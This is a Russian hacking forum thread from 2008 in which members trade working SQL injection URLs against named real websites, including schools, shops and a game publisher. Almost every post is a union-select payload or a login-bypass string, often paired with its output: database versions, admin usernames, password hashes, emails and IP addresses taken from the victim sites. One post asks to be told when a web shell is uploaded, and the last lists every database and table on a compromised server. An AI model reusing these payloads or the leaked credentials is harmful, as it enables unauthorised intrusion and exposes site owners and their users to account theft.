SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. lstsgoman

    lstsgoman New Member

    Joined:
    5 Sep 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Позходу дела большая бАза рефератов :)

    ТИЦ 350

    ЗЫ. Зальете шелл дайте знать :)
     
  2. 3xIm3

    3xIm3 Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    74
    Likes Received:
    42
    Reputations:
    0
    Code:
    http://yogacenter.ru/page.php?id=-2+union+select+table_name,2,3,4,5+from+INFORMATION_SCHEMA.TABLES+limit+19,1
    
    Code:
    http://www.biblicaltraining.org/class.php?id=-1+union+select+1,2,3,4,concat(firstname,0x3a,passwd,0x3a,lastname,0x3a,email),6,7,8,9,10,11,12,13,14,15,16+FROM+bt_users--
    
    Ed:luke00:Dingess:[email protected]
     
  3. 3xIm3

    3xIm3 Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    74
    Likes Received:
    42
    Reputations:
    0
    Code:
    http://www.prescare.org.au/article.php?es_id=-12+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15/*
    
    Code:
    http://www.prescare.org.au/article.php?es_id=-22+union+select+1,concat_ws(char(58),version(),user(),database()),3,4,5,6,7,8,9,0,1,2,3,4,5/*
    
    Code:
    http://www.destinations.com.bs/package.php?es_id=47+union+select+1,concat_ws(char(58),version(),user(),database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*
    
    Code:
    http://alpineinternationalschool.com/article.php?es_id=2+union+select+1,concat_ws(char(58),version(),user(),database()),3,4,5,6,7,8,9,0,1,2,3,4,5/*
     
  4. 3xIm3

    3xIm3 Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    74
    Likes Received:
    42
    Reputations:
    0
    Code:
    http://www.pku.org/pages/news.php?id=408+UNION+SELECT+1,2,concat_ws(0x3a,pa ssword,email)+FROM+member--
    
    Code:
    http://www.stots.edu/article.php?id=...a,password,0x3 a,host),4,5,6,7,8+from+mysql.user+limit+1,1--
    
    Code:
    http://www.snseurope.com/snslink/new...17,18,19,20+fr om+users--
    
     
  5. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    4.0.27-log
     
    1 person likes this.
  6. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    баги на www.ekranka.ru

    Code:
    http://www.ekranka.ru/?id=nx'+union+select+1,2,concat(version(),'::',user(),'::',database()),4,5,6--+AND+'0'='1
    version() = 5.0.51-3-log
    user() = [email protected]
    database() = ekranka_1

    все таблицы и поля из этой базы:

    Code:
    http://www.ekranka.ru/?m=recs&author=gordeeva'+union+select+1,COLUMN_NAME,3,4,5,6,ORDINAL_POSITION,TABLE_NAME,9+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA!='INFORMATION_SCHEMA'--+AND+'1'='1
     
  7. serfertty

    serfertty Guest

    Reputations:
    0
    Обход авторизации
    Code:
    http://fp24.ru/admin/index.php
    
    ' ' or+1=1/*
    Code:
    http://www.chukotken.ru/?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(0x3a,login,passw),12,13,14,15+from+admin/*
    
    alexis:SiteAdmin
     
    5 people like this.
  8. neonik

    neonik New Member

    Joined:
    5 Sep 2008
    Messages:
    4
    Likes Received:
    2
    Reputations:
    -5
    http://trusteelearning.org/

    HTML:
    _http://trusteelearning.org/news_read.php?id=-1/**/union/**/select/**/1,concat(user(),0x20,version(),0x20,database()),3,4,3,6,7,8,9/*
    Database Version: 4.1.20-max-log
    Database name: savoadm_etraining
    User name: [email protected]
     
    #6628 neonik, 29 Sep 2008
    Last edited: 29 Sep 2008
    1 person likes this.
  9. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    http://www.hcs.harvard.edu/~hib/viewannounce.php?ID=-26+union+select+1,2,3,4,5/*
    5.0.22-Debian_0ubuntu6.06.2-log
     
    1 person likes this.
  10. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://www.stva.us/product.php?pid=-1+union+select+1,2,version(),4,5,6,7,8,9/*&id=12&brand=267
    Code:
    http://www.shopmuseum.com/product.php?id=-1%27+union+select+1,2,3,username,5,6,7,8,9,10,11,password,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+users+limit+4,1/*&cat_id=15&sub_id=139
    Code:
    http://www.jennystackshop.com/product.php?id=-1+union+select+1,2,3,count(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables/*
     
    1 person likes this.
  11. neonik

    neonik New Member

    Joined:
    5 Sep 2008
    Messages:
    4
    Likes Received:
    2
    Reputations:
    -5
    _http://www.pointplustraining.com/

    HTML:
    _http://www.pointplustraining.com/news_read.php?id=-1/**/union/**/select/**/1,concat(user(),0x20,version(),0x20,database()),3,4,3,6,7,8,9--
    Database Version: 5.0.51a-community
    Database name: seobiz_etraining
    User name: seobiz_etraini@localhost

    admin : riyeke : eca045e0815166abc06a3cdc9a3502c5
     
    1 person likes this.
  12. KaJIaLL1HuKoB

    KaJIaLL1HuKoB New Member

    Joined:
    9 Jan 2007
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    hxxp://www.ubisoft.ru

    Code:
    http://www.ubisoft.ru/games/game.php?id=-444+union+select+1,concat(user(),0x20,version(),0x20,database()),3,4,5,6,7,8,9,10,11
     
    1 person likes this.
  13. neonik

    neonik New Member

    Joined:
    5 Sep 2008
    Messages:
    4
    Likes Received:
    2
    Reputations:
    -5
    _http://yuutu.be/

    _
    HTML:
    http://yuutu.be/index.php?loadpage=./includes/articleblock.php&articlecat=./includes/articleblock.php&articlecat=./includes/articleblock.php&articlecat=-1+union+select+1,version(),user(),4,5,6,7,8,9,10--
    5.0.27-standard
    [email protected]
     
  14. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://www.berneboek.com/shop/product.php?id=-1+union+select+concat_ws(email,0x3a,password),2,3,4+from+users+limit+2921,1/*
     
  15. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,190
    Reputations:
    430
    От нехер делать по http://yuutu.be/
    Code:
    http://yuutu.be/index.php?loadpage=./includes/articleblock.php&articlecat=./includes/articleblock.php&articlecat=./includes/articleblock.php&articlecat=-1+union+select+1,concat_ws(0x3a,userkey,username,password,ip,email),3,4,5,6,7,8,9,10+from+AMCMS_users+limit+0,1/*
    1:admin:03a612184a8c36b697f330ab03ca5c692584027f:76.247.63.232:[email protected]
     
  16. serfertty

    serfertty Guest

    Reputations:
    0
    Code:
    http://www.sport.v-lazer.com/news.php?ID=-16+union+select+1,2,3,column_name+from+information_schema.columns+where+table_name=0x6370673133325f7573657273+limit+4,1/*
    
    таблица с пасами
     
  17. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    http://davinciinstitute.com/page.php?ID=-120'+union+select+1,2,3,concat_ws(0x3a,LoginName,Password),5,6+from+AdminUsers/*
    version() - 5.0.42
    user() - davinci@localhost
    database() - davinciinstitute_com
     
    2 people like this.
  18. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    PHP:
    http://www.economics.neu.edu/exploring/index.php?pid=-3+union+select+1,version(),user(),4,5/*
    mysql - 5

    PHP:
    http://artsci.wustl.edu/~history/faculty/index.php?pid=1+and+ascii(lower(substring(version(),1,1)))=53/*&action=dspPersonFull
    mysql - 5

    PHP:
    http://www.mentorcollege.edu/index.php?pid=-3+union+select+1,2,3,version(),5/*
    mysql - 5
     
    #6638 _Pantera_, 30 Sep 2008
    Last edited: 30 Sep 2008
  19. neonik

    neonik New Member

    Joined:
    5 Sep 2008
    Messages:
    4
    Likes Received:
    2
    Reputations:
    -5
    _http://flakas.49.lt

    HTML:
    _http://flakas.49.lt/index.php?loadpage=./includes/articleblock.php&articlecat=-1
    1:admin:0df2c3843ee8c2ca4c430b64c7b2f5ce2753c289:
    78.62.125.196:[email protected]

    http://escapedturkey.com

    HTML:
    http://escapedturkey.com/cfaq/index.php?catid=-2+union+select+concat(username,0x3a,password),2+FROM+cfaq_admin/*
    Database Version: 5.0.45-community
    Database name: escapedtur_faq
    User name: et_rofaq@localhost
     
    #6639 neonik, 30 Sep 2008
    Last edited: 30 Sep 2008
  20. -=Static=-

    -=Static=- Banned

    Joined:
    12 Nov 2006
    Messages:
    201
    Likes Received:
    40
    Reputations:
    0
    Вот Список всех баз/таблиц на Мускульном серваке. Там не только пасы от галереи "Океан" =) У кого есть желание - копайте))

    HTML:
    OceanBase.cpg_albums
    OceanBase.cpg_banned
    OceanBase.cpg_categories
    OceanBase.cpg_comments
    OceanBase.cpg_config
    OceanBase.cpg_ecards
    OceanBase.cpg_exif
    OceanBase.cpg_filetypes
    OceanBase.cpg_pictures
    OceanBase.cpg_temp_data
    OceanBase.cpg_usergroups
    OceanBase.cpg_users
    OceanBase.cpg_votes
    OceanBase.freehouses
    bannerdb.phpads_acls
    bannerdb.phpads_adclicks
    bannerdb.phpads_adstats
    bannerdb.phpads_adviews
    bannerdb.phpads_affiliates
    bannerdb.phpads_banners
    bannerdb.phpads_cache
    bannerdb.phpads_clients
    bannerdb.phpads_config
    bannerdb.phpads_images
    bannerdb.phpads_session
    bannerdb.phpads_targetstats
    bannerdb.phpads_userlog
    bannerdb.phpads_zones
    catalog.course
    catalog.firms
    catalog.firms_copy
    catalog.goods
    catalog.goods_copy
    catalog.groups
    catalog.links
    catalog.pict
    catalog.pictures
    catalog.podvid
    catalog.podvid_copy
    catalog.prices
    catalog.sale
    catalog.shops
    catalog.shops_copy
    catalog.shops_pict
    catalog.spec
    catalog.towns
    catalog.towns_copy
    catalog.vid
    catalog.vid_copy
    charity.contents
    charity.news
    condor.admin_modules
    condor.admin_modules_content
    condor.admin_users
    condor.admin_users_rights
    condor.cat
    condor.catalog
    condor.contents
    condor.examples
    condor.news
    condor.type
    dbt.actions
    dbt.contents
    dbt.leaders
    dbt.news
    dbt.services
    dbt.shop_picts
    dbt.shops
    dbt.superlow
    dbt.towns
    dbt.vid
    domain.groups
    domain.ublocks
    domain.ugroups
    domain.users
    lite.actionstatus
    lite.and_photodocs
    lite.and_photorep
    lite.and_videodocs
    lite.and_videorep
    lite.artrubrics
    lite.blocks
    lite.brands
    lite.bscripts
    lite.category
    lite.condor_actions
    lite.condor_contacts
    lite.condor_events
    lite.condor_partners
    lite.condor_projects
    lite.countries
    lite.dbt_actions
    lite.dbt_actphotos
    lite.dbt_contacts
    lite.dbt_events
    lite.dbt_partners
    lite.dbt_prices
    lite.dbt_products
    lite.dbt_projects
    lite.dbt_shops
    lite.depts
    lite.dmr_points
    lite.dmr_actions
    lite.dmr_actphotos
    lite.dmr_contacts
    lite.dmr_events
    lite.dmr_market
    lite.dmr_marketdocs
    lite.dmr_products
    lite.dmr_reclama
    lite.dmr_reclamadocs
    lite.dmr_service
    lite.dmr_suvenir
    lite.doctype
    lite.eventstatus
    lite.gonets_actions
    lite.gonets_actphotos
    lite.gonets_contacts
    lite.gonets_events
    lite.gonets_np
    lite.gonets_partners
    lite.gonets_prices
    lite.gonets_projects
    lite.gonets_service
    lite.gonets_smiarticles
    lite.linkcategory
    lite.linkrubrics
    lite.links
    lite.linkstatus
    lite.main_events
    lite.mbscripts
    lite.module_events
    lite.numberstatus
    lite.ocean_articles
    lite.ocean_numbers
    lite.ocean_photos
    lite.partners
    lite.partnersp
    lite.prcategory
    lite.prestige_actions
    lite.prestige_contacts
    lite.prestige_events
    lite.prestige_partners
    lite.prestige_prices
    lite.prestige_projects
    lite.prod_actions
    lite.prod_actphotos
    lite.prod_contacts
    lite.prod_events
    lite.prod_partners
    lite.prod_prices
    lite.prod_projects
    lite.prod_shops
    lite.prrubrics
    lite.regions
    lite.rodina_actions
    lite.rodina_actphotos
    lite.rodina_contacts
    lite.rodina_events
    lite.rodina_partners
    lite.rodina_prices
    lite.rodina_products
    lite.rodina_projects
    lite.rodina_smiarticles
    lite.rubrics
    lite.sercategory
    lite.serrubrics
    lite.smi
    lite.sport_actions
    lite.sport_actphotos
    lite.sport_events
    lite.sport_prices
    lite.subscr
    lite.subscrusers
    lite.vega_actions
    lite.vega_contacts
    lite.vega_events
    lite.vega_job
    lite.vega_managers
    lite.vega_partners
    lite.vega_projects
    lite.vega_smiarticles
    lite.vll_actions
    lite.vll_actphotos
    lite.vll_contacts
    lite.vll_events
    lite.vll_partners
    lite.vll_points
    lite.vll_prices
    lite.vll_projects
    lite.vll_service
    lite.zocean_actions
    lite.zocean_actphotos
    lite.zocean_contacts
    lite.zocean_events
    lite.zocean_partners
    lite.zocean_points
    lite.zocean_prices
    lite.zocean_products
    lite.zocean_projects
    logistic._cn_articles
    logistic._cn_configuration_log
    logistic._cn_forms
    logistic._cn_forms_categories
    logistic._cn_forms_data
    logistic._cn_news
    logistic._cn_news_categories
    logistic._cn_news_themes
    logistic._cn_pages
    logistic._cn_pages_blocks
    logistic._cn_pages_context_menu
    logistic._cn_pages_context_menu_items
    logistic._cn_pages_internal_links
    logistic._cn_pages_templates
    logistic._cn_vacancies
    logistic._cn_vacancies_categories
    logistic._cn_vacancies_fields
    logistic._eng_articles
    logistic._eng_configuration_log
    logistic._eng_forms
    logistic._eng_forms_categories
    logistic._eng_forms_data
    logistic._eng_news
    logistic._eng_news_categories
    logistic._eng_news_themes
    logistic._eng_pages
    logistic._eng_pages_blocks
    logistic._eng_pages_context_menu
    logistic._eng_pages_context_menu_items
    logistic._eng_pages_internal_links
    logistic._eng_pages_templates
    logistic._eng_vacancies
    logistic._eng_vacancies_categories
    logistic._eng_vacancies_fields
    logistic._rus_articles
    logistic._rus_banners
    logistic._rus_banners_categories
    logistic._rus_catalog_categories
    logistic._rus_catalog_concerned_products
    logistic._rus_catalog_groups
    logistic._rus_catalog_products
    logistic._rus_catalog_properties
    logistic._rus_catalog_properties_def_values
    logistic._rus_catalog_properties_discounts
    logistic._rus_catalog_properties_table
    logistic._rus_catalog_property_images
    logistic._rus_catalog_property_types_images
    logistic._rus_catalog_property_values
    logistic._rus_catalog_ptypes
    logistic._rus_configuration_log
    logistic._rus_faq
    logistic._rus_faq_categories
    logistic._rus_forms
    logistic._rus_forms_categories
    logistic._rus_forms_data
    logistic._rus_gallery
    logistic._rus_gallery_categories
    logistic._rus_hotprod
    logistic._rus_hotprod_categories
    logistic._rus_news
    logistic._rus_news_categories
    logistic._rus_news_themes
    logistic._rus_pages
    logistic._rus_pages_blocks
    logistic._rus_pages_context_menu
    logistic._rus_pages_context_menu_items
    logistic._rus_pages_internal_links
    logistic._rus_pages_templates
    logistic._rus_vacancies
    logistic._rus_vacancies_categories
    logistic._rus_vacancies_fields
    logistic.contents
    logistic.conts
    logistic.modules
    logistic.news
    logistic.sites
    logistic.sites_alias
    logistic.sites_languages
    logistic.sites_modules
    logistic.subscr
    logistic.users
    logistic.users_groups
    logistic.users_roles
    logistic.users_roles_groups
    logistic.users_roles_permissions
    papyrus.p_call
    papyrus.p_call_goods
    papyrus.p_call_theme
    papyrus.p_cathegory
    papyrus.p_company
    papyrus.p_country
    papyrus.p_goods
    papyrus.p_theme
    papyrus.p_user
    pclub.banners
    pclub.categories
    pclub.contents
    pclub.news
    pclub.partners
    pclub.towns
    phpbb.phpbb_auth_access
    phpbb.phpbb_banlist
    phpbb.phpbb_categories
    phpbb.phpbb_config
    phpbb.phpbb_confirm
    phpbb.phpbb_disallow
    phpbb.phpbb_forum_prune
    phpbb.phpbb_forums
    phpbb.phpbb_groups
    phpbb.phpbb_old_config
    phpbb.phpbb_posts
    phpbb.phpbb_posts_text
    phpbb.phpbb_privmsgs
    phpbb.phpbb_privmsgs_text
    phpbb.phpbb_ranks
    phpbb.phpbb_search_results
    phpbb.phpbb_search_wordlist
    phpbb.phpbb_search_wordmatch
    phpbb.phpbb_sessions
    phpbb.phpbb_sessions_keys
    phpbb.phpbb_smilies
    phpbb.phpbb_themes
    phpbb.phpbb_themes_name
    phpbb.phpbb_topics
    phpbb.phpbb_topics_watch
    phpbb.phpbb_user_group
    phpbb.phpbb_users
    phpbb.phpbb_vote_desc
    phpbb.phpbb_vote_results
    phpbb.phpbb_vote_voters
    phpbb.phpbb_words
    prestige.assert
    prestige.city
    prestige.contacts
    prestige.events
    prestige.lows
    prestige.partners
    prestige.rubrics
    prestige.users
    sotovik.spec
    sotovik.towns
    
     
Thread Status:
Not open for further replies.